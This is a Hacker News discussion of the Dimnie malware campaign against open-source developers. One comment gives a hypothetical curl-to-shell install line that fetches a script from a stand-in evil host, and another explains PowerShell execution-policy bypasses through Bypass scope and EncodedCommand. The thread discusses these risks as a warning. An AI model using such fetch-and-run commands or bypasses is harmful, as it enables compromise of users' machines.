
Dimnie: Malware targeting open-source developers - justinclift
https://arstechnica.co.uk/security/2017/03/someone-is-putting-lots-of-work-into-hacking-github-developers/
======
jszymborski
Open-source developers are understandably high value targets, but I'd imagine
they're harder to hit with this kind of attack.

If I was some evil-doer though I'd develop some marketing heavy
Javascript/Rust/language-of-the-week framework, hit HN frontpage and have the
call-to-action copy be:

> Install in picoseconds!

> curl -sf
> [http://evil.example/evil_install.sh](http://evil.example/evil_install.sh) |
> sh

edit: corrected hypothetical attack

~~~
tyingq
pedantic, but that wouldn't actually do much ;)

~~~
jszymborski
lool oops, thanks. Fixed it up :)

------
Animats
_... starts with e-mails that attach a booby-trapped Microsoft Word document.
The file contains a malicious macro that uses PowerShell commands._

It's good to know that the traditional vulnerabilities of Microsoft Word
documents have been updated to use the new PowerShell.

~~~
pjmlp
Except that Powershell doesn't run scripts unless you explicitly disable it as
Administrator.

~~~
SCHiM
This is not a security feature, and should not be relied upon. For example,
unelevated users can run the following command: 'PS> Set-ExecutionPolicy
Bypass -Scope Process' to allow script execution in the current powershell
process.

Also, you can pass complete powershell scripts over the command line which
bypasses the script restriction (because you can just input your entire script
over the command line).

This is done with the -E (-EncodedCommand) flag. Which takes a base64 encoded
string with statements separated by semi-colons.

~~~
pjmlp
As occasional Powershell user I wasn't aware of it, thanks for the heads up.

------
TTPrograms
Wait, you can still get viruses from opening word documents? What is this,
1998?

Good to know that Microsoft is focusing on the important things.[0]

[0]
[https://en.wikipedia.org/wiki/Tay_(bot)](https://en.wikipedia.org/wiki/Tay_\(bot\))

------
miohtama
Not sure if Windows PowerShell scripts are the best way to target open source
developers, as these power users are usually on Linux/OSX

~~~
justinclift
That's true, but it's not unreasonable to foresee the creators making
OSX/Linux versions too if these Windows ones "go ok" from their point of view.
:(

What's worrying to me is the wording of the emails themselves. It's much
better, and more likely appearing "legit" than the vast multitude of
scam/trojan/similar .pdf/.xls/.doc/.lnk/etc emails I've seen. (several a day
generally)

~~~
pjmlp
With the now current _curl | sh_ pattern, one just needs some MTM attack, or
even just trick someone to do it, as the majority never look to the contents
of the shell script.

~~~
jjirsa
It's been demonstrated in the past that server can detect the pipe to shell
and modify content - timing attack, if I recall correctly

~~~
samsonradu
How does it work? Any sources?

~~~
drdaeman
[https://www.idontplaydarts.com/2016/04/detecting-curl-
pipe-b...](https://www.idontplaydarts.com/2016/04/detecting-curl-pipe-bash-
server-side/)

~~~
samsonradu
Thanks, that's very interesting.

------
davidgerard
The takeaway appears to be: don't develop on a Windows box.

What happens if you open the claimed Word doc in LibreOffice?

------
kingosticks
What's the purpose of all those localhost ping lines in the delete script?

~~~
h4waii
The author likely is used to Windows scripting before sleep was a thing.

The pings are used as a delay, without pausing the entire process or thread.

~~~
Godel_unicode
More likely the author knows that sleep is a common thing for malware scanners
to look for, and choose a sneakier method to achieve the same goal.

------
codedokode
They could just put malware into one of popular node.js modules. Nobody would
notice because Linux/Mac users don't use antivirus.

~~~
auspex
This is why most companies have a build step in their CI/CD pipeline that
scans for CVE/malware in their app's dependencies (jar, npm packages, Ruby
gems etc)

~~~
srd
While the concept sounds sound, so far I've never actually seen this setup in
the real world. Do you happen to have any resources on how to properly setup
such a step in a CI tool?

~~~
auspex
Check out software like Twistlock, Sonatype and I think Tennable has a scanner
as well that integrates into the pipeline. If your are not using Sonatype to
build you can find good support for this in Jenkins or Team City via a plugin
(Full disclosure, I work in this area)

------
dang
Url changed from [https://arstechnica.co.uk/security/2017/03/someone-is-
puttin...](https://arstechnica.co.uk/security/2017/03/someone-is-putting-lots-
of-work-into-hacking-github-developers/), which points to this. There was a
small discussion at
[https://news.ycombinator.com/item?id=13992005](https://news.ycombinator.com/item?id=13992005)
but perhaps changing the url to the original article will stimulate a more
substantive one.

Submitters: please submit original sources, as the site guidelines ask
([https://news.ycombinator.com/newsguidelines.html](https://news.ycombinator.com/newsguidelines.html)).
Myriads of blog posts and articles mostly just point to something else; be a
good HN submitter and do the pointer traversal for the rest of us.

~~~
skrebbel
In all honesty, Ars does a real value-add in this case. I'm an open source
developer on Windows so this feels relevant, but the original article forces
me to read through a very long, highly technical article full of HTTP logs and
hex dumps just to find out how this could impact me. About halfway through I
gave up and then I was happy I found your comment with the Ars link.

~~~
dang
That's a good point. I've changed the URL back from
[http://researchcenter.paloaltonetworks.com/2017/03/unit42-di...](http://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-
hiding-plain-sight/).

